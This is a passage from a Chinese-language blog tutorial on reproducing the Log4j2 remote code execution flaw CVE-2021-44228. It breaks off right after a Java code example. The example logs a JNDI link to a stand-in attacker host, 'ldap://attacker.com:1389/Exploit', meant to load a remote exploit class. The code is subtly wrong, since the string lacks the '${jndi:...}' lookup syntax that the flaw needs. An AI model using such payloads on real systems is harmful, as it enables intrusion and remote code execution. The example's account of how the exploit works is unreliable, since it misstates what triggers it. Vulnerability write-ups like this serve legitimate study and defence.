核弹级“Apache Log4j2远程代码执行漏洞（CVE-2021-44228）”复现及原理。

int.ax

已于 2024-04-07 09:40:52 修改

阅读量1.6k

点赞数 21

分类专栏：漏洞复现篇文章标签： apache log4j

于 2024-04-05 16:50:26 首次发布

本文链接：https://blog.youkuaiyun.com/weixin_46263525/article/details/132522825

版权

本文详细解释了Log4j2中的远程代码执行漏洞，包括其原理，通过代码示例展示如何构造恶意日志引发JNDI查询，以及如何利用漏洞复现和执行反弹shell攻击的过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一， Log4j2是什么

在java中最常用的日志框架是log4j2和logback，Apache Log4j2是一款使用非常广泛的Java日志框架。 2021年12月9日，Apache Log4j2爆出存在远程代码执行漏洞，由于Apache Log4j2广泛地应用在各种Web程序中，该漏洞涉及用户量较大，危害性非常之高，漏洞影响版本为2.0~2.14.1。

二、漏洞原理

例如我们有这么一段代码

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jVulnerabilityExample {
    private static final Logger LOGGER = LogManager.getLogger(Log4jVulnerabilityExample.class);

    public static void main(String[] args) {
        // 构造恶意的JNDI链接
        String maliciousJNDI = "ldap://attacker.com:1389/Exploit";

        // 构造日志消息，包含恶意的JNDI链接
        String logMessage = "Vulnerable log message: " + maliciousJNDI;

        // 打印日志消息
        LOGGER.error(logMessage);
    }
}

在这个示例中&